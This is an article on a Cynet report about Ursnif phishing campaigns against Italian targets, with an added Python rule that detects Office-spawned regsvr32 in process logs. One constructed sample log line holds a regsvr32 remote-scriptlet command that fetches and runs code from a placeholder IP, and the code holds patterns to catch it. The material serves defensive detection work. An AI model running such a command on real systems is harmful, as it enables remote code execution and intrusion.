A recent report by Cynet, the Israeli cybersecurity company, shows that the group behind Ursnif has intensified its cyber attacks on Italy. Ursnif, also known as Gozi, is a banking trojan with a long history of campaigns behind it. The data are particularly alarming because they reveal a widespread trend of attacks aimed exclusively at Italian targets.
Ursnif's main purpose appears to be data exfiltration. However, several of the observed attacks involve variants that add capabilities such as:
- backdoor: code that lets an attacker gain administrator-level access to websites and computers without any authorized credentials.
- spyware: software that collects information about a user's online activity without their consent.
In particular, the attacks appear to target the healthcare sector, the armed forces and e-commerce, but also large-scale retail and industry.
Cyber attacks: how Ursnif works
In general, the observed attacks share a preliminary spear-phishing stage. Spear-phishing differs from ordinary phishing in the personalization of the message: it is built from information about the victim found online, so that the email appears to come from a service the target actually uses.
The victim is then asked to fill in an attached form, in this case an Excel file, which carries the malicious payload. Once it runs, the attackers only need it to download a DLL and execute it through regsvr32, a legitimate Windows utility for registering DLLs that is abused here to load the malicious library, in order to establish a command-and-control channel into the victim's environment.
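The chain above (Office document spawning regsvr32 to load a freshly downloaded DLL) is exactly what an endpoint detection rule keys on. The following Python snippet is an added example, not code from Cynet's report or from the original article: it scans constructed Sysmon-style process-creation events (the field names `Image`, `ParentImage`, `CommandLine` and `User`, the paths and the IP address are all assumptions) and flags regsvr32.exe when its parent is an Office application. It generalizes slightly beyond the article by also flagging the remote-scriptlet form of regsvr32 abuse (`/i:http://...`), which the report does not mention, and it rates the finding by where the DLL is loaded from.

```python
"""Detect Office -> regsvr32 DLL execution in process-creation logs (added example)."""
import json
import re
from typing import Dict, List, Optional

# Office processes that should essentially never spawn regsvr32.exe in normal use.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}

# Locations a malicious document can write to without admin rights (assumed list).
USER_WRITABLE = re.compile(
    r"\\(?:users\\[^\\]+\\appdata|users\\public|programdata|windows\\temp)\\",
    re.IGNORECASE,
)
REMOTE_SCRIPTLET = re.compile(r"/i:\s*https?://", re.IGNORECASE)

# Constructed sample log lines (Sysmon Event ID 1 style, JSON lines). Not real telemetry.
SAMPLE_LOGS = r"""
{"EventID":1,"Image":"C:\\Windows\\System32\\regsvr32.exe","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE","CommandLine":"regsvr32.exe /s C:\\Users\\mario\\AppData\\Local\\Temp\\modulo.dll","User":"ACME\\mario"}
{"EventID":1,"Image":"C:\\Windows\\System32\\regsvr32.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"regsvr32.exe /s C:\\Program Files\\Vendor\\control.ocx","User":"ACME\\admin"}
{"EventID":1,"Image":"C:\\Windows\\System32\\regsvr32.exe","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE","CommandLine":"regsvr32.exe /s /n /u /i:http://203.0.113.10/x.sct scrobj.dll","User":"ACME\\anna"}
{"EventID":1,"Image":"C:\\Windows\\System32\\notepad.exe","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE","CommandLine":"notepad.exe","User":"ACME\\mario"}
{"EventID":1,"Image":"C:\\Windows\\System32\\regsvr32.exe","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","CommandLine":"regsvr32.exe /s \"C:\\Program Files\\Vendor\\addin.dll\"","User":"ACME\\luca"}
"""


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> List[Dict[str, str]]:
    """Parse JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return a severity for an Office-parented regsvr32 launch, or None if benign."""
    if _basename(event.get("Image", "")) != "regsvr32.exe":
        return None
    if _basename(event.get("ParentImage", "")) not in OFFICE_PARENTS:
        return None
    cmd = event.get("CommandLine", "")
    # DLL fetched from the internet or dropped into a user-writable folder:
    # this is the dropper pattern described for the Ursnif campaign.
    if REMOTE_SCRIPTLET.search(cmd) or USER_WRITABLE.search(cmd):
        return "high"
    # Office spawning regsvr32 is unusual even for a trusted path; worth a look.
    return "medium"


def scan(text: str) -> List[Dict[str, str]]:
    """Run the rule over a log dump and return the alerts in log order."""
    alerts = []
    for ev in parse_events(text):
        sev = classify(ev)
        if sev:
            alerts.append({"severity": sev, "user": ev.get("User", ""),
                           "command": ev.get("CommandLine", "")})
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOGS):
        print(f"[{a['severity'].upper()}] {a['user']}: {a['command']}")
```

The rule deliberately keys on the parent-child relationship rather than on regsvr32 alone, because administrators and installers run regsvr32 legitimately (the explorer.exe line above is left alone). Note that an alert here fires only after the user has already opened the attachment and the macro has run, which is the point made below about the earlier layers having failed.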
“The primary goal of the Ursnif group is data theft for the purpose of obtaining unauthorized gains and carrying out further attacks using that information,” says Marco Lucchina, Channel Manager Italy, Spain & Portugal at Cynet. “Ursnif has already been reported in several phishing campaigns in recent weeks, associated with messages such as ‘Receipt AgenziaEntrate’ or ‘DHL reminder’, but, thanks to the activity carried out by our Orion Group (Threat Intelligence), we have detected much broader use and targeted attacks tailored to individual clients.
Furthermore, the fact that Cynet detected and blocked the threat the moment the user double-clicked, triggering the first malicious payload, means that the earlier protection layers such as antispam and user training were not sufficiently effective: an alarm indicating the importance of adopting a ‘defense in depth’ approach.”